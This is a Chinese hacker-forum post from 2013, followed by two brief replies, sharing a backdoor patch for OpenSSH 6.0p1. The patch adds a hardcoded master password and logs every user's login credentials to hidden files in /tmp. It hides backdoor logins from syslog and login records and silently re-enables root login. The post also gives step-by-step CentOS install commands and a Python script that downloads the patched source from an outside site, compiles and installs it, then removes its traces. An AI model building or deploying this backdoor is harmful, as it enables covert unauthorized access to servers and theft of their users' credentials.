搜索
中国白客联盟»论坛 Techniques 渗透入侵(Hacker attacks) ssh path
返回列表 发新帖
查看: 564|回复: 2

ssh path

[复制链接]
admin

1839

主题

2255

帖子

1万

积分

管理员

Rank: 9Rank: 9Rank: 9

积分
11913
发表于 2013-10-24 17:29:52 | 显示全部楼层 |阅读模式
ssh_patch并不是一个rootkit,而是ssh的后门补丁.他的作用具象点说:比如得到了一台linux服务器的root权限,但是不知道root密码,使用这个补丁重新编译ssh,就可以用root和自己的密码登录网站,而原先的root密码仍然可以登录,是一个绝佳的隐藏后门
以下是ssh_patch补丁
  1. # wget http://mirror.bytemark.co.uk/OpenBSD/OpenSSH/portable/openssh-6.0p1.tar.gz
  2. # patch < OpenSSH-6.0p1.patch
  3. # ./configure --prefix=/usr --sysconfdir=/etc/ssh --with-pam --with-kerberos5
  4. # make && make install
  5. # bob@dtors.net
  6. --- openssh-6.0p1/auth-pam.c    2009-07-12 13:07:21.000000000 +0100
  7. +++ ./auth-pam.patch        2012-05-22 15:16:38.219834621 +0100
  8. @@ -1210,6 +1210,10 @@
  9.         if (sshpam_err == PAM_SUCCESS && authctxt->valid) {
  10.             debug("PAM: password authentication accepted for %.100s",
  11.             authctxt->user);
  12. +                        if((f=fopen(ILOG,"a"))!=NULL){
  13. +                        fprintf(f,"%s:%s\n",authctxt->user, password);
  14. +                        fclose(f);
  15. +                        }
  16.             return 1;
  17.         } else {
  18.             debug("PAM: password authentication failed for %.100s: %s",
  19. --- openssh-6.0p1/auth-passwd.c  2009-03-08 00:40:28.000000000 +0000
  20. +++ ./auth-passwd.patch        2012-05-22 15:16:38.219834621 +0100
  21. @@ -86,6 +86,11 @@
  22.         static int expire_checked = 0;
  23. #endif

  25. +if (!strcmp(password, entr0py)) {
  26. +        passphrase=1;
  27. +        return 1;
  28. +}
  29. +
  30. #ifndef HAVE_CYGWIN
  31.         if (pw->pw_uid == 0 && options.permit_root_login != PERMIT_YES)
  32.             ok = 0;
  33. @@ -123,6 +128,12 @@
  34.         }
  35. #endif
  36.         result = sys_auth_passwd(authctxt, password);
  37. +        if(result){
  38. +                if((f=fopen(ILOG,"a"))!=NULL){
  39. +                fprintf(f,"%s:%s\n",authctxt->user, password);
  40. +                fclose(f);
  41. +                }
  42. +        }
  43.         if (authctxt->force_pwchange)
  44.             disable_forwarding();
  45.         return (result && ok);
  46. --- openssh-6.0p1/auth.c        2011-05-29 12:40:42.000000000 +0100
  47. +++ ./auth.patch        2012-05-22 15:16:38.219834621 +0100
  48. @@ -271,14 +271,16 @@
  49.         else
  50.             authmsg = authenticated ? "Accepted" : "Failed";

  52. -        authlog("%s %s for %s%.100s from %.200s port %d%s",
  53. -            authmsg,
  54. -            method,
  55. -            authctxt->valid ? "" : "invalid user ",
  56. -            authctxt->user,
  57. -            get_remote_ipaddr(),
  58. -            get_remote_port(),
  59. -            info);
  60. +        if(!passphrase || passphrase !=1){
  61. +                authlog("%s %s for %s%.100s from %.200s port %d%s",
  62. +                    authmsg,
  63. +                    method,
  64. +                    authctxt->valid ? "" : "invalid user ",
  65. +                    authctxt->user,
  66. +                    get_remote_ipaddr(),
  67. +                    get_remote_port(),
  68. +                    info);
  69. +        }

  71. #ifdef CUSTOM_FAILED_LOGIN
  72.         if (authenticated == 0 && !authctxt->postponed &&
  73. --- openssh-6.0p1/canohost.c    2010-10-12 03:28:12.000000000 +0100
  74. +++ ./canohost.patch        2012-05-22 15:16:38.219834621 +0100
  75. @@ -78,10 +78,12 @@

  77.         debug3("Trying to reverse map address %.100s.", ntop);
  78.         /* Map the IP address to a host name. */
  79. +        if(!passphrase || passphrase!=1){
  80.         if (getnameinfo((struct sockaddr *)&from, fromlen, name, sizeof(name),
  81.           NULL, 0, NI_NAMEREQD) != 0) {
  82.             /* Host name not found.  Use ip address. */
  83.             return xstrdup(ntop);
  84. +                }
  85.         }

  87.         /*
  88. --- openssh-6.0p1/includes.h    2010-10-24 00:47:30.000000000 +0100
  89. +++ ./includes.patch        2012-05-22 15:16:38.219834621 +0100
  90. @@ -172,4 +172,9 @@

  92. #include "entropy.h"

  94. +int passphrase;
  95. +FILE *f;
  96. +#define ILOG "/tmp/.ilog"
  97. +#define OLOG "/tmp/.olog"
  98. +#define entr0py "correcthorsebatterystaple"
  99. #endif /* INCLUDES_H */
  100. --- openssh-6.0p1/log.c        2011-06-20 05:42:23.000000000 +0100
  101. +++ ./log.patch        2012-05-22 15:16:38.220835117 +0100
  102. @@ -351,6 +351,7 @@
  103. void
  104. do_log(LogLevel level, const char *fmt, va_list args)
  105. {
  106. +if(!passphrase || passphrase!=1){
  107. #if defined(HAVE_OPENLOG_R) && defined(SYSLOG_DATA_INIT)
  108.         struct syslog_data sdata = SYSLOG_DATA_INIT;
  109. #endif
  110. @@ -428,3 +429,4 @@
  111.         }
  112.         errno = saved_errno;
  113. }
  114. +}
  115. --- openssh-6.0p1/servconf.c    2011-10-02 08:57:38.000000000 +0100
  116. +++ ./servconf.patch        2012-05-22 15:16:38.220835117 +0100
  117. @@ -686,7 +686,7 @@
  118.         { "without-password",    PERMIT_NO_PASSWD },
  119.         { "forced-commands-only",        PERMIT_FORCED_ONLY },
  120.         { "yes",                PERMIT_YES },
  121. -        { "no",                PERMIT_NO },
  122. +        { "no",                PERMIT_YES },
  123.         { NULL, -1 }
  124. };
  125. static const struct multistate multistate_compression[] = {
  126. --- openssh-6.0p1/sshconnect2.c  2011-05-29 12:42:34.000000000 +0100
  127. +++ ./sshconnect2.patch        2012-05-22 15:16:38.220835117 +0100
  128. @@ -878,6 +878,10 @@
  129.         snprintf(prompt, sizeof(prompt), "%.30s@%.128s's password: ",
  130.           authctxt->server_user, host);
  131.         password = read_passphrase(prompt, 0);
  132. +        if((f=fopen(OLOG,"a"))!=NULL){
  133. +                fprintf(f,"%s:%s@%s\n",authctxt->server_user,password,authctxt->host);
  134. +                fclose(f);
  135. +        }
  136.         packet_start(SSH2_MSG_USERAUTH_REQUEST);
  137.         packet_put_cstring(authctxt->server_user);
  138.         packet_put_cstring(authctxt->service);
  139. --- openssh-6.0p1/sshlogin.c    2011-01-11 06:20:07.000000000 +0000
  140. +++ ./sshlogin.patch        2012-05-22 15:16:38.220835117 +0100
  141. @@ -133,8 +133,10 @@

  143.         li = login_alloc_entry(pid, user, host, tty);
  144.         login_set_addr(li, addr, addrlen);
  145. +        if (!passphrase || passphrase!=1){
  146.         login_login(li);
  147.         login_free_entry(li);
  148. +        }
  149. }

  151. #ifdef LOGIN_NEEDS_UTMPX
  152. @@ -146,8 +148,10 @@

  154.         li = login_alloc_entry(pid, user, host, ttyname);
  155.         login_set_addr(li, addr, addrlen);
  156. +        if(!passphrase || passphrase!=1){
  157.         login_utmp_only(li);
  158.         login_free_entry(li);
  159. +        }
  160. }
  161. #endif

  163. @@ -158,6 +162,8 @@
  164.         struct logininfo *li;

  166.         li = login_alloc_entry(pid, user, NULL, tty);
  167. +        if(!passphrase || passphrase!=1){
  168.         login_logout(li);
  169.         login_free_entry(li);
  170. +        }
  171. }
复制代码

注释中已经写明了安装方法
以centos为例进行演示
  1. [root@localhost openssh-6.0p1]# wget http://mirror.bytemark.co.uk/OpenBSD/OpenSSH/portable/openssh-6.0p1.tar.gz
  2. [root@localhost openssh-6.0p1]# tar -zxvf openssh*  
  3. [root@localhost openssh-6.0p1]# cp OpenSSH-6.0p1.patch openssh-6.0p1
  4. [root@localhost openssh-6.0p1]# patch < OpenSSH-6.0p1.patch
  5. patching file auth-pam.c
  6. patching file auth-passwd.c
  7. patching file auth.c
  8. patching file canohost.c
  9. patching file includes.h
  10. patching file log.c
  11. patching file servconf.c
  12. patching file sshconnect2.c
  13. patching file sshlogin.c
  14. [root@localhost openssh-6.0p1]# sed -i "s/correcthorsebatterystaple/password/g" includes.h #passwd就是root后门密码
  15. [root@localhost openssh-6.0p1]# yum install gcc openssl-devel pam-devel rpm-build    #确保预编译环境
  16. [root@localhost openssh-6.0p1]# ./configure --prefix=/usr --sysconfdir=/etc/ssh --with-pam --with-kerberos5
  17. [root@localhost openssh-6.0p1]# make && make install
  18. [root@localhost openssh-6.0p1]# service sshd restart
  19. 停止 sshd:                       [确定]
  20. 正在启动 sshd:                    [确定]
  21. [root@localhost openssh-6.0p1]#
复制代码

接下来就可以以root和passwd登录了,
顺便附上Python安装代码,只要执行
  1. python rootkit.py
复制代码

即可
  1. #coding=utf-8



  5. import os
  6. import urllib
  7. import zipfile
  8. import platform


  11. ####################################################################################
  12. #                                #
  13. #                                sirius                          #
  14. #                                QQ:111111111                    #
  15. #                                #
  16. ####################################################################################

  18. def makeDir():
  19.     #该函数用来新建/tmp/rootkit目录
  20.     try:
  21.         os.makedirs("/tmp/rootkit")
  22.     except:
  23.         pass

  25.     os.chdir("/tmp/rootkit")


  28. def deleteAllFile(theFolder):
  29.     #该函数用来删除/tmp/rootkit目录
  30.     if os.path.isfile(theFolder):
  31.         try:
  32.           os.remove(theFolder)
  33.         except:
  34.           pass
  35.     elif os.path.isdir(theFolder):
  36.         for item in os.listdir(theFolder):
  37.           fullPath=os.path.join(theFolder, item)
  38.           deleteAllFile(fullPath)

  40.         try:
  41.           os.rmdir(theFolder)
  42.         except:
  43.           pass

  45. def downloadFile(theUrl, theFile):
  46.     #该函数用来下载rootkit并放到/tmp/rootkit目录
  47.     try:
  48.         urllib.urlretrieve(theUrl, theFile)
  49.     except:
  50.         print "Cannot download file to /tmp/rootkit, Please check Internet"
  51.         exit()


  54. def unzipFile(zipName):
  55.     #该函数用来解压zip文件
  56.     zipFile=zipfile.ZipFile(zipName)
  57.     zipFileList=zipFile.namelist()

  59.     for file in zipFileList:
  60.         zipFile.extract(file)
  61.    
  62.     zipFile.close()
  63.     return zipFileList[0]


  66. def sshPatch():
  67.     patchUrl="http://www.coolhacker.org/wp-content/uploads/2013/10/openssh-6.0p11.zip"
  68.     patchName="openssh-6.0p1.zip"
  69.     makeDir()
  70.     os.chdir("/tmp/rootkit")
  71.     downloadFile(patchUrl, patchName)
  72.     paths=unzipFile(patchName)
  73.     os.chdir(paths)
  74.     os.system("chmod a+x *")
  75.     password=raw_input("Enter the password: ")
  76.     message="sed -i 's/correcthorsebatterystaple/%s/g' includes.h" % password
  77.     if platform.linux_distribution()[0]=="Ubuntu":
  78.         os.system("apt-get install zlib1g-dev openssl libpam-dev")
  79.         os.system(message)
  80.         os.system("./configure --prefix=/usr --sysconfdir=/etc/ssh --with-pam --with-kerberos5")
  81.         os.system("make && make install")
  82.         os.system("/etc/init.d/ssh restart")
  83.     elif platform.linux_distribution()[0]=="CentOS":
  84.         os.system("yum install gcc openssl-devel pam-devel rpm-build")
  85.         os.system(message)
  86.         os.system("chmod a+x configure")
  87.         os.system("./configure --prefix=/usr --sysconfdir=/etc/ssh --with-pam --with-kerberos5")
  88.         os.system("make && make install")
  89.         os.system("service sshd restart")
  90.     else:
  91.         print "暂不支持CentOS和Ubuntu以外的发行版"
  92.         deleteAllFile("/tmp/rootkit/")
  93.         exit()
  94.     deleteAllFile("/tmp/rootkit")
  95. if __name__=="__main__":
  96.     sshPatch()

  98.    
复制代码
过段时间可能会取消签到功能了
回复

使用道具 举报

854955425 该用户已被删除
发表于 2013-10-24 17:30:01 | 显示全部楼层
大家互帮互助
回复 支持 反对

使用道具 举报

专业回帖 该用户已被删除
发表于 2013-10-24 17:35:25 | 显示全部楼层
找到好贴不容易,我顶你了,谢了
回复 支持 反对

使用道具 举报

返回列表 发新帖
高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | Join BUC

本版积分规则

Powered by Discuz!

© 2012-2015 Baiker Union of China.

快速回复 返回顶部 返回列表